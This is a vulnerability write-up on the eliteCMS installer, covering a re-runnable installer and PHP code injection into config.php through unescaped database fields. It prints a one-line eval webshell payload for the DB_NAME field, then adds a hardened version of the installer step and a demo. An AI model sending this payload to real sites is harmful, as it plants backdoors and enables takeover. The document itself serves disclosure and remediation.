The eliteCMS installer is not locked after installation completes, so an attacker can re-run the whole installation simply by requesting the installer URL again.

The second vulnerability is that the installer writes a one-line backdoor (一句话木马) straight into admin/includes/config.php.
Let's look at the code (install step 4, which generates the config file):

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ... (omitted) ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // Session values originate from $_POST and are interpolated into PHP source unescaped.
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= " die(\"Database connection failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= " die(\"Database select failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "?>\n";

    // The assembled source is written to the web-accessible config file.
    $writer = fopen($file, 'w');
    ...
Now look at where those session values come from:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken from the POST request without any validation or escaping.
If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

the one-line backdoor is written into /admin/includes/config.php, which is then included by every admin page. Because the value is spliced into PHP source as-is, the closing quote and ?> break out of the string literal and out of PHP mode, so the attacker controls what the file contains; the payload must still leave the surrounding statement parseable for the backdoor to actually execute.
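As an added example (not eliteCMS's own code), here is a hardened version of the same installer step in PHP that addresses both issues above: an install.lock file that stops the installer from being re-run, and DB parameters that are whitelisted and emitted through var_export() instead of being interpolated into PHP source. The file and function names (install.lock, build_config_unsafe, build_config_safe, run_install_step4) and the sample payload array are assumptions constructed for illustration.

```php
<?php
// Added example, not from the eliteCMS code base. Names below are assumptions.

// Vulnerable pattern from the original installer: request-controlled values
// are interpolated directly into PHP source, so a quote or "?>" in any value
// escapes the string literal and PHP mode.
function build_config_unsafe(array $db): string {
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $k) {
        $out .= "define(\"$k\", \"{$db[$k]}\");\n";
    }
    $out .= "?>\n";
    return $out;
}

// Hardened: whitelist host/name/user, bound the password length, and emit
// every value through var_export(), which produces a properly escaped
// single-quoted literal. "?>" inside a string literal does not end PHP mode.
function build_config_safe(array $db): string {
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER'] as $k) {
        if (!isset($db[$k]) || !preg_match('/^[A-Za-z0-9_.:-]{1,64}$/', $db[$k])) {
            throw new InvalidArgumentException("invalid value for $k");
        }
    }
    if (!isset($db['DB_PASS']) || strlen($db['DB_PASS']) > 256) {
        throw new InvalidArgumentException("invalid value for DB_PASS");
    }
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $k) {
        $out .= "define('$k', " . var_export((string) $db[$k], true) . ");\n";
    }
    // No closing "?>": avoids stray whitespace output and another mode boundary.
    return $out;
}

// Installer entry point: refuse to run once install.lock (assumed name) exists,
// and create the lock as soon as the config has been written.
function run_install_step4(array $post, string $installDir, string $configFile): void {
    $lock = $installDir . '/install.lock';
    if (file_exists($lock)) {
        http_response_code(403);
        exit("Already installed. Delete install.lock to reinstall.\n");
    }
    $config = build_config_safe($post);
    if (file_put_contents($configFile, $config, LOCK_EX) === false) {
        exit("Could not write config file\n");
    }
    file_put_contents($lock, date('c'));
}

// Demonstration with a constructed POST body carrying the payload from the write-up.
$payload = [
    'DB_SERVER' => 'localhost',
    'DB_NAME'   => '"?><?php eval($_POST[c]);?><?php',
    'DB_USER'   => 'root',
    'DB_PASS'   => 'p@ss"w\'ord',
];

echo "--- unsafe output (payload lands verbatim in PHP source) ---\n";
echo build_config_unsafe($payload);

echo "--- hardened: payload rejected ---\n";
try {
    build_config_safe($payload);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}

echo "--- hardened output with a legitimate name; quotes in the password stay inert ---\n";
$payload['DB_NAME'] = 'elitecms';
echo build_config_safe($payload);
```

The whitelist is deliberately strict for host, database and user names; the password is the only field that must accept arbitrary characters, and var_export() is what makes that safe. The lock file only helps if the installer directory itself is also removed or made non-writable after setup, since an attacker who can delete install.lock is back where they started.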